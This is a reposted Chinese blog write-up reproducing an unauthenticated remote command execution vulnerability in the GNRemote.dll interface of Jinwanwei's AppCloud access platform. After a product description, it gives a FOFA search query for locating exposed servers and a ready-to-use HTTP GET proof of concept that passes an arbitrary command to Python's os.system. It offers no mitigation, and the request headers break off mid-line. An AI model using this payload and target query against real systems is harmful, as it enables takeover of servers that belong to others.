0


金万维-云联应用系统接入平台 GNRemote.dll 前台RCE漏洞复现

0x01 产品简介

金万维-云联(AppCloud)应用系统接入平台是一款企业级私有云产品,旨在帮助企业构建高效便捷的私有云环境,降低运营成本,提高运营效率,并增强企业快速响应市场的能力,云联(AppCloud)由北京金万维科技有限公司开发,它完成了从桌面机计算到云中计算的转变,不仅提供了一种空间,还实现了架构和计算方式的转变。云联要求流程自动化、简化部署,并提供灵活性,以满足企业在任何地方、用任何工具都能高效工作的需求。

0x02 漏洞概述

金万维-云联应用系统接入平台 GNRemote.dll接口存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:title="云联应用系统接入平台"

eec6c2e96c244247b0bb22a2baf1ce46.png

0x04 漏洞复现

PoC

GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: g
标签: 安全 web安全

本文转载自: https://blog.csdn.net/qq_41904294/article/details/140716856
版权归原作者 0xSecl 所有, 如有侵权,请联系我们删除。

“金万维-云联应用系统接入平台 GNRemote.dll 前台RCE漏洞复现”的评论:

还没有评论